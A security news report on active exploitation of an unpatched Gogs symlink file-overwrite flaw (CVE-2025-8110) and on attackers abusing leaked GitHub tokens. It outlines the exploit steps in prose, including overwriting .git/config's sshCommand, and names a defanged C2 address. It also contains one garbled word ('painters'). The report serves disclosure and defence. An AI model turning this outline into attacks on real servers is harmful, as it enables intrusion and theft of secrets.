A high-severity unpatched security vulnerability in Gogs has come under active exploitation, with more than 700 compromised instances accessible over the internet, according to new findings from Wiz.
The flaw, tracked as CVE-2025-8110 (CVSS score: 8.7), is a case of file overwrite in the file update API of the Go-based self-hosted Git service. A fix for the issue is said to be currently in the works. The company said it accidentally discovered the zero-day flaw in July 2025 while investigating a malware infection on a customer’s machine.
“Improper symbolic link handling in the PutContents API in Gogs allows local execution of code,” according to a description of the vulnerability in CVE.org.
The cloud security company said CVE-2025-8110 is a bypass for a previously patched remote code execution flaw (CVE-2024-55947, CVSS score: 8.7) that allows an attacker to write a file to an arbitrary path on the server and gain SSH access to the server. CVE-2024-55947 was addressed by the painters in December 2024.
Wiz said the fix put in place by Gogs to resolve CVE-2024-55947 could be circumvented by taking advantage of the fact that Git (and therefore, Gogs) allows symbolic links to be used in git repositories, and those symlinks can point to files or directories outside the repository. Additionally, the Gogs API allows file modification outside of the regular Git protocol.
As a result, this failure to account for symlinks could be exploited by an attacker to achieve arbitrary code execution through a four-step process –
- Create a standard git repository
- Commit a single symbolic link pointing to a sensitive target
- Use the PutContents API to write data to the symlink, causing the system to follow the link and overwrite the target file outside the repository
- Overwrite “.git/config” (specifically the sshCommand) to execute arbitrary commands
As for the malware deployed in the activity, it’s assessed to be a payload based on Supershell, an open-source command-and-control (C2) framework often used by Chinese hacking groups that can establish a reverse SSH shell to an attacker-controlled server (“119.45.176[.]196”).
Wiz said that the attackers behind the exploitation of CVE-2025-8110 left behind the created repositories (e.g., “IV79VAew / Km4zoh4s”) on the customer’s cloud workload when they could have taken steps to delete or mark them as private following the infection. This carelessness points to a “smash-and-grab” style campaign, it added.
In all, there are about 1,400 exposed Gogs instances, out of which more than 700 have exhibited signs of compromise, particularly the presence of 8-character random owner/repository names. All the identified repositories were created around July 10, 2025.
“This suggests that a single actor, or perhaps a group of actors all using the same tooling, are responsible for all infections,” researchers Gili Tikochinski and Yaara Shriki said.
Given that the vulnerability does not have a fix, it’s essential that users disable open-registration, limit exposure to the internet, and scan instances for repositories with random 8-character names.
The disclosure comes as Wiz also warned that threat actors are targeting leaked GitHub Personal Access Tokens (PAT) as high-value entry points to obtain initial access to victim cloud environments and even leverage them for cross-cloud lateral movement from GitHub to Cloud Service Provider (CSP) control plane.
The issue at hand is that a threat actor with basic read permissions via a PAT can use GitHub’s API code search to discover secret names embedded directly in a workflow’s YAML code. To complicate matters further, if the exploited PAT has write permissions, attackers can execute malicious code and remove traces of their malicious activity.
“Attackers leveraged compromised PATs to discover GitHub Action Secrets names in the codebase, and used them in newly created malicious workflows to execute code and obtain CSP secrets,” researcher Shira Ayal said. “Threat actors have also been observed exfiltrating secrets to a webhook endpoint they control, completely bypassing Action logs.”
